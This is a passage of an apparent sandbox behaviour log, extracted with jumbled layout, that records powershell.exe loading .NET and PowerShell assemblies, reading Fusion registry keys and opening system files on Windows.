Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
00:03:594
Read DisplayName
00:03:594
Read LastModTime
Registry
00:03:594 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
Opened
00:03:594
Read Modules
00:03:594
Read Status
00:03:594
Read SIG
00:03:594
Read EvalationData
Registry
00:03:594 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34
Opened
Registry
00:03:594 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
Opened
Registry
00:03:594 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
Opened
Registry
00:03:594 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37
Opened
00:03:594
Read Status
00:03:594
Read NIDependencies
00:03:594
00:03:594
Read MVID
00:03:594
Read ILDependencies
Registry
00:03:594 Opened HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
00:03:594
Read DisplayName
00:03:594
Read ConfigString
00:03:594
Read LastModTime
Registry
00:03:594 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66
Opened
00:03:594
Read Modules
00:03:594
Read SIG
00:03:594
Read Status
Registry
00:03:609 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.System.Management.Automation__31bf3856ad364e35
Opened
00:03:609
Read System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL
00:03:609
Read System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL
Registry
00:03:609 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration.Install__b03f5f7f11d50a3a
Opened
Signal
00:03:625 global\cordbipcsetupsyncevent_1160
Objects
Registry
00:03:625 HKLM\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
Opened
File
Searched a directory for the name:
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.INI
miscellaneous
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
Files Read
00:03:625
Opened Normal
File
00:03:641 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
miscellaneous
Registry
00:03:671 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76
00:03:687
Read LastModTime
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
00:03:687
Read NIDependencies
00:03:687
Read DisplayName
00:03:687 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76

Opened
Registry
00:03:687 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70
Opened
Registry
00:03:687 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72
Opened
Registry
00:03:687 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
Opened
Registry
00:03:687 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Transactions__b77a5c561934e089
Opened
Registry
00:03:687 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data__b77a5c561934e089
Opened
00:03:687
Read Status
00:03:687
Read System.Transactions,2.0.0.0,,b77a5c561934e089,x86
00:03:687
00:03:687
Read MVID
00:03:687
Read ILDependencies
00:03:687
Read EvalationData
00:03:687
Read DisplayName
00:03:687
Read ConfigString
00:03:687
Read ConfigMask
00:03:687
Read Status
00:03:687
Read Modules
Registry
00:03:687 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37
Opened
00:03:687
Read SIG
Registry
00:03:687 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70
00:03:687
Read Modules
00:03:687
Read DisplayName
00:03:687
Read LastModTime
00:03:687
Read System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
00:03:687
Read System.DirectoryServices,2.0.0.0,,b03f5f7f11d50a3a,MSIL
00:03:687
Read System.Data,2.0.0.0,,b77a5c561934e089,x86
Registry
00:03:687 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.DirectoryServices__b03f5f7f11d50a3a
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72
00:03:687
Read Status
00:03:687
Read SIG
00:03:687
Read Modules
00:03:687
Read LastModTime
00:03:687
Read SIG
00:03:687
Read DisplayName
00:03:687
Read Status
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
00:03:687
Read Status
00:03:687
Read SIG
00:03:687
Read Modules
00:03:687
Read LastModTime
00:03:687
Read DisplayName
File
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.INI
miscellaneous
00:03:734 Files Read C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\system32\l_intl.nls
Files Read
00:03:750
Opened Normal
File
00:03:750 Operations, Obtained the path of the Windows system directory
miscellaneous
00:03:782 Others Enabled/disabled privileges in an access token
powershell.exe
Process Terminate & CreateThread & SetSessionID & VMOperation & VMRead & VMWrite & DupHandle & CreateProcess & SetQuota & SetInformation &
00:03:796
Opened QueryInformation
Process
00:03:796 Operations, Obtained the identifier of the thread or process that created the specified window
miscellaneous
Process
00:03:796 Operations, Retrieved system information
miscellaneous
Process
00:03:828 Operations, Obtained the priority value for a thread
miscellaneous
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Files Read
00:03:969
Opened Normal
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Files Read
00:03:969
Opened Normal
Registry HKLM\Software\Microsoft\PowerShell\1\PowerShellEngine
00:03:984
Read ApplicationBase
Registry
00:03:984 HKLM\Software\Microsoft\PowerShell\1\PowerShellEngine
Opened
Registry
00:03:984 HKLM\Software\Microsoft\PowerShell\1
Opened
Registry
00:03:984 HKLM\Software\Microsoft\PowerShell
Opened
Registry
00:04:000 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38
00:04:000
Read Status
00:04:000
Read SIG
00:04:000
Read Modules
00:04:000
Read LastModTime
00:04:000
Read DisplayName
Registry
00:04:000 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084
Opened
Registry
00:04:000 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\7b5311d7\61
00:04:000
Read Status
Registry
00:04:000 HKLM\Software\Microsoft\StrongName
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\7f5cd084\38
00:04:000 Read ConfigMask
00:04:000
Read ConfigString
00:04:000
Read DisplayName
00:04:000
Read EvalationData
00:04:000
Read ILDependencies
00:04:000
Read MVID
00:04:000
00:04:000
Read NIDependencies
00:04:000
Read Status
Registry
00:04:000 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Diagnostics__31bf3856ad364e35
Opened
00:04:000
Read ConfigMask
00:04:000
Read ConfigString
00:04:000
Read DisplayName
00:04:000
Read EvalationData
00:04:000
Read ILDependencies
00:04:000
Read MVID
00:04:000
00:04:000
Read NIDependencies
Registry
00:04:000 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
00:04:015
Read Status
00:04:015
Read SIG
00:04:015
Read Modules
00:04:015
Read LastModTime
00:04:015 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85

Read DisplayName
Registry
00:04:015 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
Opened
Registry
00:04:015 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61
Opened
Registry
00:04:015 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
Opened
Registry
00:04:015 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.3.5.System.Core__b77a5c561934e089
Opened
00:04:015
Read Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL
00:04:015
Read System.Core,3.5.0.0,,b77a5c561934e089,MSIL
00:04:015
Read System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61
00:04:015
Read Status
00:04:015
Read SIG
00:04:015
Read Modules
00:04:015
Read LastModTime
00:04:015
Read DisplayName
File
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.INI
miscellaneous
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
00:04:046
Read ILDependencies
00:04:046
Read NIDependencies
00:04:046
Read Status
00:04:046
00:04:046 Files Read C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll
00:04:046
Read MVID
Registry
00:04:046 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
Opened
Registry
00:04:046 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06
Opened
Registry
00:04:046 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66
Opened
00:04:046
Read EvalationData
00:04:046
Read ConfigMask
File
00:04:046 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.INI
miscellaneous
00:04:046
Read DisplayName
00:04:046
Read ConfigString
Registry
00:04:063 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Management__31bf3856ad364e35
Opened
Registry
00:04:063 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
Opened
Registry
00:04:063 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
00:04:063
Read DisplayName
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
00:04:063
Read Status
00:04:063
Read SIG
00:04:063
Read Modules
00:04:063
Read LastModTime
00:04:063
Read DisplayName
00:04:063
Read LastModTime
00:04:063
Read Modules
00:04:063
Read SIG
00:04:063
Read Status
Registry
00:04:063 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
Opened
File
00:04:063 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Configuration.Install\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.INI
miscellaneous
00:04:063 Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
Read System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
00:04:063
Read System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
00:04:078
Read EvalationData
Registry
00:04:078 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Runtime__31bf3856ad364e35
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c
00:04:078
Read Status
00:04:078
Read SIG
00:04:078
Read Modules
00:04:078
Read LastModTime
00:04:078
Read DisplayName
00:04:078
Read System.ServiceProcess,2.0.0.0,,b03f5f7f11d50a3a,MSIL
00:04:078
Read Status
00:04:078
Read NIDependencies
00:04:078
00:04:078
Read MVID
00:04:078
Read ILDependencies
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25
00:04:078
Read DisplayName
Registry
00:04:078 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25
Opened
Registry
00:04:078 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c
Opened
00:04:078
Read DisplayName
00:04:078
Read ConfigString
00:04:078
Read ConfigMask
Registry
00:04:078 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.ServiceProcess__b03f5f7f11d50a3a
Opened
Registry
00:04:078 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26
Opened
00:04:078
Read Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL
00:04:078 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25

Read Status
00:04:078
Read SIG
00:04:078
Read Modules
00:04:078
Read LastModTime
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26
00:04:078
Read Status
00:04:078
Read Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL
Registry
00:04:078 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f\26
Opened
Registry
00:04:078 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\43f5e26f
Opened
00:04:078
Read SIG
00:04:078 Read Modules
00:04:078
Read LastModTime
00:04:078
Read DisplayName
00:04:093 Files Read C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
Files Read
00:04:093
Opened Normal
File
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.INI
miscellaneous
Registry
00:04:110 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.EnterpriseServices__b03f5f7f11d50a3a
Opened
Registry
00:04:110 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34\71
00:04:110
Read ConfigMask
00:04:110
Read Status
00:04:110
Read NIDependencies
00:04:110
Read System.EnterpriseServices,2.0.0.0,,b03f5f7f11d50a3a,x86
00:04:110
00:04:110 Read MVID
00:04:110
Read ILDependencies
Registry
00:04:110 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6eae2d34\3b249b34
Opened
00:04:110
Read EvalationData
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71
00:04:110
Read LastModTime
00:04:110
Read DisplayName
00:04:110
Read ConfigString
00:04:110
Read DisplayName
00:04:110
Read Status
Registry
00:04:110 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71
Opened
00:04:110
Read SIG
00:04:110
Read Modules
C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
Files Read
00:04:125
Opened Normal
File
00:04:125 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.INI
miscellaneous
Files Read
00:04:140
Opened 8000000
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
00:04:171
Read ConfigMask
00:04:171
00:04:171
Read ConfigString
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
00:04:171
Read SIG
Registry
00:04:171 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43
Opened
00:04:171
Read System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
00:04:171 Read DisplayName
00:04:171
Read Status
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
00:04:171
Read LastModTime
Registry
00:04:171 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a
Opened
00:04:171
Read EvalationData
00:04:171
Read Microsoft.JScript,8.0.0.0,,b03f5f7f11d50a3a,MSIL
00:04:171
Read ILDependencies
00:04:171
Read MVID
00:04:171
Read Status
00:04:171
Read NIDependencies
00:04:171
Read System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43
00:04:171
Read DisplayName
Registry
00:04:171 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
Opened
Registry
00:04:171 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35
00:04:171
Read Status
00:04:171
Read SIG
00:04:171
Read Modules
00:04:171
Read LastModTime
Registry
00:04:171 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
Opened
Registry
00:04:171 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04
Opened
00:04:171
Read DisplayName
Registry
00:04:171 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.JScript__b03f5f7f11d50a3a
Opened
Registry
00:04:171 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\7df4ed04\35
Opened
00:04:171
Read Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL
Registry
00:04:171 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
Opened
00:04:171
Read Status
00:04:171
Read SIG
00:04:171
Read Modules
Registry
00:04:171 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Utility__31bf3856ad364e35
Opened
00:04:171
Read DisplayName
00:04:171
Read DisplayName
00:04:171
Read LastModTime
00:04:171
Read Status
00:04:171
Read SIG
00:04:171
Read Modules
00:04:171
Read LastModTime
00:04:171
Read Modules
00:04:188 Files Read C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll
File
C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.INI
miscellaneous
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
00:04:203
00:04:203
Read ConfigString
00:04:203
Read DisplayName
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36
00:04:203
Read LastModTime
00:04:203
Read EvalationData
00:04:203 Files Read C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll
00:04:203 Read ILDependencies
00:04:203
Read MVID
Registry
00:04:203 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81\36
Opened
Registry
00:04:203 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web.Services__b03f5f7f11d50a3a
Opened
00:04:203
Read NIDependencies
Registry
00:04:203 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\74219a81
Opened
00:04:203
Read Status
Registry
00:04:203 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Management__31bf3856ad364e35
Opened
Registry
00:04:203 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36
Opened
Registry
00:04:203 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a
Opened
00:04:203
Read ConfigMask
00:04:203
Read Modules
00:04:203
Read SIG
00:04:203
Read Status
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a
00:04:203
Read Status
00:04:203
Read SIG
00:04:203
Read Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL
00:04:203
Read Modules
00:04:203 Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a
Read LastModTime
00:04:203
Read DisplayName
00:04:203
Read System.Web.Services,2.0.0.0,,b03f5f7f11d50a3a,MSIL
00:04:203
Read DisplayName
00:04:218 Files Read C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
File
00:04:218 Operations, Searched a directory for the name:
miscellaneous C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.INI
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
00:04:235
Read ConfigString
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f
00:04:235
Read Status
Registry
00:04:235 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de
Opened
Registry
00:04:235 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\259d21de\2f
Opened
00:04:235
Read SIG
00:04:235
Read Modules
00:04:235
Read DisplayName
Registry
00:04:235 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f
Opened
00:04:235
Read LastModTime
00:04:235
Read DisplayName
00:04:235
Read EvalationData
00:04:235
Read ConfigMask
00:04:235
Read ILDependencies
00:04:235
Read MVID
00:04:235
00:04:235
Read NIDependencies
00:04:235
Read Status
00:04:235
Read Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL
Registry
00:04:235 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Security__31bf3856ad364e35
Opened
File
00:04:250 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.INI
miscellaneous
00:04:250 Files Read C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll
Registry HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2969830022-2362906686-2146684197-
00:04:282
Opened 500\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe
Registry
00:04:282 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2b1373f4\4f4f14cc
Opened
00:04:282 Files Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.config
Registry
00:04:282 HKLM\SOFTWARE\Classes\Installer\Assemblies\Global
Opened
Registry
00:04:282 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-2969830022-2362906686-2146684197-500\Installer\Assemblies\Global
Opened
Registry
00:04:282 HKCU\Software\Microsoft\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe
Opened
Registry
00:04:282 HKCU\Software\Microsoft\Installer\Assemblies\Global
Opened
Registry
00:04:282 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.ConsoleHost.resources_en-US_31bf3856ad364e35
Opened
Registry
00:04:282 HKLM\SOFTWARE\Classes\Installer\Assemblies\C:|Windows|SysWOW64|WindowsPowerShell|v1.0|powershell.exe
Opened
CONOUT$
Files Read & Write
00:04:343
Opened Normal
00:04:343 Others Determined whether a specified security identifier (SID) is enabled in an access token
Registry
00:04:375 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57
Opened
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
00:04:390
Read Status
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
00:04:390
Read Status
Registry
00:04:390 HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089
Opened
00:04:390
Read SIG
00:04:390
Read Modules
00:04:390
Read DisplayName
00:04:390
Read System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
00:04:390
Read ConfigMask
00:04:390
Read ConfigString
00:04:390
Read DisplayName
00:04:390
Read EvalationData
00:04:390 Read ILDependencies
00:04:390
Read MVID
00:04:390
00:04:390
Read NIDependencies
Registry
00:04:390 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
Opened
Registry
00:04:390 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
Opened
00:04:390
Read LastModTime
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
00:04:407
Read ConfigMask
File
00:04:407 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
miscellaneous
Registry
00:04:407 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47
Opened
Registry
00:04:407 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4
Opened
00:04:407
Read ConfigString
00:04:407
Read DisplayName
00:04:421
Read Status
00:04:421
Read EvalationData
00:04:421
Read ILDependencies
00:04:421
Read MVID
00:04:421
00:04:421
Read NIDependencies
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
00:04:438
Read ILDependencies
00:04:438
Read Status
00:04:438
Read NIDependencies
00:04:438 Read MissingDependencies
00:04:438
Read MVID
00:04:438
Read EvalationData
00:04:438
Read DisplayName
00:04:438
Read ConfigString
00:04:438
Read ConfigMask
Registry
00:04:438 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d
Opened
Registry
00:04:438 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\340dcf4c\3a6a696d\73
Opened
File
00:04:438 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.INI
miscellaneous
File
